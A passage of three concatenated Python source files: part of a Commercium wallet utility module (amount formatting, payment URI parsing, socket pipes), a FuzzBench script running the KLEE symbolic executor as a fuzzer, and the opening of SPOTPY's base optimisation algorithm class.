assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
#v = hfu(x)
#v1 = v.decode('ascii')
#return v1
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".commerciumelectro")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "CommerciumElectro")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "CommerciumElectro")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'explorer.commercium.net': ('https://explorer.commercium.net/',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'explorer.commercium.net': ('https://explorer.commercium.net/',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'explorer.commercium.net')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'cmm':
raise BaseException("Not Commercium URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='cmm', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def check_www_dir(rdir):
import urllib, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
fuzzer.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration code for AFL fuzzer."""
# pylint: disable=too-many-arguments
import shutil
import os
import glob
import pathlib
import struct
import subprocess
import threading
import time
from datetime import datetime
from fuzzers import utils
LIB_BC_DIR = 'lib-bc'
SYMBOLIC_BUFFER = 'kleeInputBuf'
MODEL_VERSION = 'model_version'
MAX_SOLVER_TIME_SECONDS = 30
MAX_TOTAL_TIME_DEFAULT = 82800 # Default experiment duration = 23 hrs.
def is_benchmark(name):
"""Check if the benchmark contains the string |name|"""
benchmark = os.getenv('BENCHMARK', None)
return benchmark is not None and name in benchmark
def prepare_build_environment():
"""Set environment variables used to build benchmark."""
if is_benchmark('sqlite3'):
sqlite3_flags = [
'-DSQLITE_THREADSAFE=0', '-DSQLITE_OMIT_LOAD_EXTENSION',
'-DSQLITE_DEFAULT_MEMSTATUS=0', '-DSQLITE_MAX_EXPR_DEPTH=0',
'-DSQLITE_OMIT_DECLTYPE', '-DSQLITE_OMIT_DEPRECATED',
'-DSQLITE_DEFAULT_PAGE_SIZE=512', '-DSQLITE_DEFAULT_CACHE_SIZE=10',
'-DSQLITE_DISABLE_INTRINSIC', '-DSQLITE_DISABLE_LFS',
'-DYYSTACKDEPTH=20', '-DSQLITE_OMIT_LOOKASIDE', '-DSQLITE_OMIT_WAL',
'-DSQLITE_DEFAULT_LOOKASIDE=\'64,5\'',
'-DSQLITE_OMIT_PROGRESS_CALLBACK', '-DSQLITE_OMIT_SHARED_CACHE'
]
utils.append_flags('CFLAGS', sqlite3_flags)
utils.append_flags('CXXFLAGS', sqlite3_flags)
#This convinces sqlite3 ./configure script to not reenable threads
os.environ['enable_threadsafe'] = 'no'
# See https://klee.github.io/tutorials/testing-function/
cflags = ['-O0', '-Xclang', '-disable-O0-optnone']
utils.append_flags('CFLAGS', cflags)
utils.append_flags('CXXFLAGS', cflags)
# Add flags for various benchmarks.
add_compilation_cflags()
os.environ['LLVM_CC_NAME'] = 'clang-6.0'
os.environ['LLVM_CXX_NAME'] = 'clang++-6.0'
os.environ['LLVM_AR_NAME'] = 'llvm-ar-6.0'
os.environ['LLVM_LINK_NAME'] = 'llvm-link-6.0'
os.environ['LLVM_COMPILER'] = 'clang'
os.environ['CC'] = 'wllvm'
os.environ['CXX'] = 'wllvm++'
os.environ['FUZZER_LIB'] = '/libAFL.a' # -L/ -lKleeMock -lpthread'
# Fix FUZZER_LIB for various benchmarks.
fix_fuzzer_lib()
def openthread_suppress_error_flags():
"""Suppress errors for openthread"""
return [
'-Wno-error=embedded-directive',
'-Wno-error=gnu-zero-variadic-macro-arguments',
'-Wno-error=overlength-strings', '-Wno-error=c++11-long-long',
'-Wno-error=c++11-extensions', '-Wno-error=variadic-macros'
]
def get_size_for_benchmark():
"""
Returns the size for the seed for each benchmark.
"""
size = 256
if 're2-2014-12-09' in os.environ['BENCHMARK']:
size = 64
if 'libpng' in os.environ['BENCHMARK']:
size = 128
return size
def get_bcs_for_shared_libs(fuzz_target):
"""Get shared libs paths for the fuzz_target"""
ldd_cmd = ['/usr/bin/ldd', '{target}'.format(target=fuzz_target)]
output = ''
try:
output = subprocess.check_output(ldd_cmd, universal_newlines=True)
except subprocess.CalledProcessError:
raise ValueError('ldd failed')
for line in output.split('\n'):
if '=>' not in line:
continue
out_dir = '{out}/{lib_bc_dir}'.format(out=os.environ['OUT'],
lib_bc_dir=LIB_BC_DIR)
path = pathlib.Path(out_dir)
path.mkdir(exist_ok=True)
so_path = line.split('=>')[1].split(' ')[1]
so_name = so_path.split('/')[-1].split('.')[0]
if so_name:
getbc_cmd = 'extract-bc -o {out_dir}/{so_name}.bc {target}'.format(
target=so_path, out_dir=out_dir, so_name=so_name)
print('[extract-bc command] | {getbc_cmd}'.format(
getbc_cmd=getbc_cmd))
# This will fail for most of the dependencies, which is fine. We
# want to grab the .bc files for dependencies built in any given
# benchmark's build.sh file.
success = os.system(getbc_cmd)
if success == 1:
print('Got a bc file for {target}'.format(target=so_path))
def get_bc_files():
"""Returns list of .bc files in the OUT directory"""
out_dir = './' + LIB_BC_DIR
files = os.listdir(out_dir)
bc_files = []
for filename in files:
if filename.split('.')[-1] == 'bc' and 'fuzz-target' not in filename:
bc_files.append(filename)
return bc_files
def fix_fuzzer_lib():
"""Fix FUZZER_LIB for certain benchmarks"""
os.environ['FUZZER_LIB'] += ' -L/ -lKleeMock -lpthread'
if is_benchmark('curl'):
shutil.copy('/libKleeMock.so', '/usr/lib/libKleeMock.so')
shutil.copy('/libAFL.a', '/usr/lib/libFuzzingEngine.a')
if is_benchmark('systemd'):
shutil.copy('/libAFL.a', '/usr/lib/libFuzzingEngine.a')
ld_flags = ['-lpthread']
utils.append_flags('LDFLAGS', ld_flags)
def add_compilation_cflags():
"""Add custom flags for certain benchmarks"""
if is_benchmark('openthread'):
openthread_flags = openthread_suppress_error_flags()
utils.append_flags('CFLAGS', openthread_flags)
utils.append_flags('CXXFLAGS', openthread_flags)
elif is_benchmark('php'):
php_flags = ['-D__builtin_cpu_supports\\(x\\)=0']
utils.append_flags('CFLAGS', php_flags)
utils.append_flags('CXXFLAGS', php_flags)
# For some benchmarks, we also tell the compiler
# to ignore unresolved symbols. This is useful when we cannot change
# the build process to add a shared library for linking
# (which contains mocked functions: libAflccMock.so).
# Note that some functions are only defined post-compilation
# during the LLVM passes.
elif is_benchmark('bloaty') or is_benchmark('openssl') or is_benchmark(
'systemd'):
unresolved_flags = ['-Wl,--warn-unresolved-symbols']
utils.append_flags('CFLAGS', unresolved_flags)
utils.append_flags('CXXFLAGS', unresolved_flags)
elif is_benchmark('curl'):
dl_flags = ['-ldl', '-lpsl']
utils.append_flags('CFLAGS', dl_flags)
utils.append_flags('CXXFLAGS', dl_flags)
def build():
"""Build benchmark."""
prepare_build_environment()
utils.build_benchmark()
fuzz_target = os.getenv('FUZZ_TARGET')
fuzz_target_path = os.path.join(os.environ['OUT'], fuzz_target)
getbc_cmd = f'extract-bc {fuzz_target_path}'
if os.system(getbc_cmd) != 0:
raise ValueError('extract-bc failed')
get_bcs_for_shared_libs(fuzz_target_path)
def rmdir(path):
""""Remove a directory recursively"""
if os.path.isdir(path):
shutil.rmtree(path)
def emptydir(path):
"""Empty a directory"""
rmdir(path)
os.mkdir(path)
# pylint: disable=too-many-locals
def run(command, hide_output=False, ulimit_cmd=None):
"""Run the command |command|, optionally, run |ulimit_cmd| first."""
cmd = ' '.join(command)
print('[run_cmd] {}'.format(cmd))
output_stream = subprocess.DEVNULL if hide_output else None
if ulimit_cmd:
ulimit_command = [ulimit_cmd + ';']
ulimit_command.extend(command)
print('[ulimit_command] {}'.format(' '.join(ulimit_command)))
ret = subprocess.call(' '.join(ulimit_command),
stdout=output_stream,
stderr=output_stream,
shell=True)
else:
ret = subprocess.call(command,
stdout=output_stream,
stderr=output_stream)
if ret != 0:
raise ValueError('command failed: {ret} - {cmd}'.format(ret=ret,
cmd=cmd))
def convert_seed_inputs(ktest_tool, input_klee, input_corpus):
"""
Convert seeds to a format KLEE understands.
Returns the number of converted seeds.
"""
print('[run_fuzzer] Converting seed files...')
# We put the file data into the symbolic buffer,
# and the model_version set to 1 for uc-libc
model = struct.pack('@i', 1)
files = glob.glob(os.path.join(input_corpus, '*'))
n_converted = 0
for seedfile in files:
if '.ktest' in seedfile:
continue
if not os.path.isfile(seedfile):
continue
# Truncate the seed to the max size for the benchmark
file_size = os.path.getsize(seedfile)
benchmark_size = get_size_for_benchmark()
if file_size > benchmark_size:
print('[run_fuzzer] Truncating {path} ({file_size}) to \
{benchmark_size}'.format(path=seedfile,
file_size=file_size,
benchmark_size=benchmark_size))
os.truncate(seedfile, benchmark_size)
seed_in = '{seed}.ktest'.format(seed=seedfile)
seed_out = os.path.join(input_klee, os.path.basename(seed_in))
# Create file for symblic buffer
input_file = '{seed}.ktest.{symbolic}'.format(seed=seedfile,
symbolic=SYMBOLIC_BUFFER)
output_kfile = '{seed}.ktest'.format(seed=seedfile)
shutil.copyfile(seedfile, input_file)
os.rename(seedfile, input_file)
# Create file for mode version
model_input_file = '{seed}.ktest.{symbolic}'.format(
seed=seedfile, symbolic=MODEL_VERSION)
with open(model_input_file, 'wb') as mfile:
mfile.write(model)
# Run conversion tool
convert_cmd = [
ktest_tool, 'create', output_kfile, '--args', seed_out, '--objects',
MODEL_VERSION, SYMBOLIC_BUFFER
]
run(convert_cmd)
# Move the resulting file to klee corpus dir
os.rename(seed_in, seed_out)
n_converted += 1
print('[run_fuzzer] Converted {converted} seed files'.format(
converted=n_converted))
return n_converted
# pylint: disable=wrong-import-position
# pylint: disable=too-many-locals
def convert_individual_ktest(ktest_tool, kfile, queue_dir, output_klee,
crash_dir, info_dir):
"""
Convert an individual ktest, return the number of crashes.
"""
convert_cmd = [ktest_tool, 'extract', kfile, '--objects', SYMBOLIC_BUFFER]
run(convert_cmd)
# And copy the resulting file in output_corpus
ktest_fn = os.path.splitext(kfile)[0]
file_in = '{file}.{symbuf}'.format(file=kfile, symbuf=SYMBOLIC_BUFFER)
file_out = os.path.join(queue_dir, os.path.basename(ktest_fn))
os.rename(file_in, file_out)
# Check if this is a crash
crash_regex = os.path.join(output_klee, '{fn}.*.err'.format(fn=ktest_fn))
crashes = glob.glob(crash_regex)
n_crashes = 0
if len(crashes) == 1:
crash_out = os.path.join(crash_dir, os.path.basename(ktest_fn))
shutil.copy(file_out, crash_out)
info_in = crashes[0]
info_out = os.path.join(info_dir, os.path.basename(info_in))
shutil.copy(info_in, info_out)
return n_crashes
def convert_outputs(ktest_tool, output_klee, crash_dir, queue_dir, info_dir):
"""Convert output files from KLEE format to binary format."""
print('[convert_thread] Waiting for ktests...')
n_ktest = 1
n_converted = 0
n_crashes = 0
while True:
ktest_file = os.path.join(output_klee,
'test{0:0{1}d}'.format(n_ktest, 6) + '.ktest')
print('[convert_thread] Waiting for file {filename}'.format(
filename=ktest_file))
while not os.path.isfile(ktest_file):
time.sleep(60)
# We have new files to convert.
print('[convert_thread] Starting new conversion with {filename}'.format(
filename=ktest_file))
while os.path.isfile(ktest_file):
n_crashes += convert_individual_ktest(ktest_tool, ktest_file,
queue_dir, output_klee,
crash_dir, info_dir)
n_ktest += 1
n_converted += 1
ktest_file = os.path.join(
output_klee, 'test{0:0{1}d}'.format(n_ktest, 6) + '.ktest')
print('[convert_thread] Converted {converted} output files. \
Found {crashes} crashes'.format(converted=n_converted,
crashes=n_crashes))
# pylint: disable=import-error
# pylint: disable=import-outside-toplevel
def monitor_resource_usage():
"""Monitor resource consumption."""
import psutil
print('[resource_thread] Starting resource usage monitoring...')
start = datetime.now()
while True:
time.sleep(60 * 5)
message = '{cputimes}\n{virtmem}\n{swap}'.format(
cputimes=psutil.cpu_times_percent(percpu=False),
virtmem=psutil.virtual_memory(),
swap=psutil.swap_memory())
now = datetime.now()
print(
'[resource_thread] Resource usage after {time}:\n{message}'.format(
time=now - start, message=message))
# pylint: disable=import-error
# pylint: disable=import-outside-toplevel
def fuzz(input_corpus, output_corpus, target_binary):
"""Run fuzzer."""
import psutil
# Set ulimit. Note: must be changed as this does not take effect
if os.system('ulimit -s unlimited') != 0:
raise ValueError('ulimit failed')
# Convert corpus files to KLEE .ktest format
out_dir = os.path.dirname(target_binary)
ktest_tool = os.path.join(out_dir, 'bin/ktest-tool')
output_klee = os.path.join(out_dir, 'output_klee')
crash_dir = os.path.join(output_corpus, 'crashes')
input_klee = os.path.join(out_dir, 'seeds_klee')
queue_dir = os.path.join(output_corpus, 'queue')
info_dir = os.path.join(output_corpus, 'info')
emptydir(crash_dir)
emptydir(queue_dir)
emptydir(info_dir)
emptydir(input_klee)
rmdir(output_klee)
n_converted = convert_seed_inputs(ktest_tool, input_klee, input_corpus)
# Run KLEE
# Option -only-output-states-covering-new makes
# dumping ktest files faster.
# New coverage means a new edge.
# See lib/Core/StatsTracker.cpp:markBranchVisited()
# Start converting thread.
print('[run_fuzzer] Starting converting thread')
converting_thread = threading.Thread(target=convert_outputs,
args=(ktest_tool, output_klee,
crash_dir, queue_dir, info_dir))
converting_thread.start()
print('[run_fuzzer] Starting resource monitoring thread')
monitoring_thread = threading.Thread(target=monitor_resource_usage)
monitoring_thread.start()
print('[run_fuzzer] Running target with klee')
klee_bin = os.path.join(out_dir, 'bin/klee')
target_binary_bc = '{}.bc'.format(target_binary)
max_time_seconds = (
int(os.getenv('MAX_TOTAL_TIME', str(MAX_TOTAL_TIME_DEFAULT))) * 4) // 5
seeds_option = ['-zero-seed-extension', '-seed-dir', input_klee
] if n_converted > 0 else []
llvm_link_libs = []
for filename in get_bc_files():
llvm_link_libs.append('-link-llvm-lib=./{lib_bc}/{filename}'.format(
lib_bc=LIB_BC_DIR, filename=filename))
max_memory_mb = str(int(psutil.virtual_memory().available // 10**6 * 0.9))
klee_cmd = [
klee_bin,
'-always-output-seeds',
'-max-memory',
max_memory_mb,
'-max-solver-time',
f'{MAX_SOLVER_TIME_SECONDS}s',
'-log-timed-out-queries',
'-max-time',
f'{max_time_seconds}s',
'-libc',
'uclibc',
'-libcxx',
'-posix-runtime',
'-disable-verify', # Needed because debug builds don't always work.
'-output-dir',
output_klee,
]
klee_cmd.extend(llvm_link_libs)
if seeds_option:
klee_cmd.extend(seeds_option)
size = get_size_for_benchmark()
klee_cmd += [target_binary_bc, str(size)]
run(klee_cmd, ulimit_cmd='ulimit -s unlimited')
# Klee has now terminated.
print('[run_fuzzer] Klee has terminated.')
# Give the converting thread enough time to complete.
n_ktest = len(glob.glob(os.path.join(output_klee, '*.ktest')))
n_converted = len(os.listdir(queue_dir)) + len(os.listdir(crash_dir))
print(
'[run_fuzzer] {ktests} ktests and {converted} converted files.'.format(
ktests=n_ktest, converted=n_converted))
while n_ktest != n_converted:
time.sleep(30)
n_converted = len(os.listdir(queue_dir)) + len(os.listdir(crash_dir))
# Let's log the end.
print('[run_fuzzer] Main thread terminated successfully.')
|
_algorithm.py
|
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the standards for every algorithm.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from spotpy import database
from spotpy import parameter
import numpy as np
import time
import threading
import inspect
import sys
try:
from queue import Queue
except ImportError:
# If the running python version is 2.* we have only Queue available as a multiprocessing class
# we need to stop the whole main process which this sleep for one microsecond otherwise the subprocess is not
# finished and the main process can not access it and put it as garbage away (Garbage collectors cause)
# However this slows down the whole simulation process and is a boring bug. Python3.x does not need this
# workaround
from Queue import Queue
class _RunStatistic(object):
"""
this class checks for each run if the objectivefunction got better and holds the
best parameter set.
Every _algorithm has an object of this class as status.
Usage:
status = _RunStatistic()
status(rep,like,params)
"""
def __init__(self, repetitions, algorithm_name, optimization_direction, parnames):
self.optimization_direction = optimization_direction #grid, mazimize, minimize
print('Initializing the ',algorithm_name,' with ',repetitions,' repetitions')
if optimization_direction == 'minimize':
self.compare = self.minimizer
print('The objective function will be minimized')
if optimization_direction == 'maximize':
self.compare = self.maximizer
print('The objective function will be minimized')
if optimization_direction == 'grid':
self.compare = self.grid
self.rep = 0
self.parnames = parnames
self.parameters= len(parnames)
self.params_min = [np.nan]*self.parameters
self.params_max = [np.nan]*self.parameters
self.objectivefunction_min = 1e308
self.objectivefunction_max = -1e308
self.starttime = time.time()
self.last_print = time.time()
self.repetitions = repetitions
self.stop = False
def minimizer(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
def maximizer(self, objval, params):
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def grid(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def __call__(self, objectivefunction, params, block_print=False):
self.rep+=1
if type(objectivefunction) == type([]): #TODO: change to iterable
self.compare(objectivefunction[0], params)
elif type(objectivefunction) == type(np.array([])):
pass
else:
self.compare(objectivefunction, params)
if self.rep == self.repetitions:
self.stop = True
if not block_print:
self.print_status()
def print_status(self):
# get str showing approximate timeleft to end of simulation in H, M, S
acttime = time.time()
# Refresh progressbar every two second
if acttime - self.last_print >= 2:
avg_time_per_run = (acttime - self.starttime) / (self.rep + 1)
timestr = time.strftime("%H:%M:%S", time.gmtime(round(avg_time_per_run * (self.repetitions - (self.rep + 1)))))
if self.optimization_direction == 'minimize':
text = '%i of %i, minimal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, timestr)
if self.optimization_direction == 'maximize':
text = '%i of %i, maximal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_max, timestr)
if self.optimization_direction == 'grid':
text = '%i of %i, min objf=%g, max objf=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, self.objectivefunction_max, timestr)
print(text)
self.last_print = time.time()
def print_status_final(self):
print('\n*** Final SPOTPY summary ***')
print('Total Duration: ' + str(round((time.time() - self.starttime), 2)) + ' seconds')
print('Total Repetitions:', self.rep)
if self.optimization_direction == 'minimize':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
if self.optimization_direction == 'maximize':
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
if self.optimization_direction == 'grid':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
print('******************************\n')
def __repr__(self):
return 'Min objectivefunction: %g \n Max objectivefunction: %g' % (
self.objectivefunction_min, self.objectivefunction_max)
class _algorithm(object):
"""
Implements an algorithm.
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return an list of simulation results (as long as evaluation list)
parameter: function
When called, it should return a random parameter combination. Which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
Should return the true values as return by the model.
dbname: str
Name of the database where parameter, objectivefunction value and simulation
results will be saved.
dbformat: str
ram: fast suited for short sampling time. no file will be created and results are saved in an array.
csv: A csv file will be created, which you can import afterwards.
parallel: str
seq: Sequentiel sampling (default): Normal iterations on one core of your cpu.
mpc: Multi processing: Iterations on all available cores on your (single) pc
mpi: Message Passing Interface: Parallel computing on high performance computing clusters, py4mpi needs to be installed
save_threshold: float or list
Compares the given value/list of values with return value/list of values from spot_setup.objectivefunction.
If the objectivefunction value is higher, the results are saved in the database. If not they are ignored (saves storage).
db_precision:np.float type
set np.float16, np.float32 or np.float64 for rounding of floats in the output database
Default is np.float16
sim_timeout: float, int or None, default: None
the defined model given in the spot_setup class can be controlled to break after 'sim_timeout' seconds if
sim_timeout is not None.
If the model run has been broken simlply '[nan]' will be returned.
random_state: int or None, default: None
the algorithms uses the number in random_state as seed for numpy. This way stochastic processes can be reproduced.
"""
_unaccepted_parameter_types = (parameter.List, )
def __init__(self, spot_setup, dbname=None, dbformat=None, dbinit=True,
dbappend=False, parallel='seq', save_sim=True, breakpoint=None,
backup_every_rep=100, save_threshold=-np.inf, db_precision=np.float16,
sim_timeout=None, random_state=None, optimization_direction='grid', algorithm_name=''):
# Initialize the user defined setup class
self.setup = spot_setup
param_info = parameter.get_parameters_array(self.setup, unaccepted_parameter_types=self._unaccepted_parameter_types)
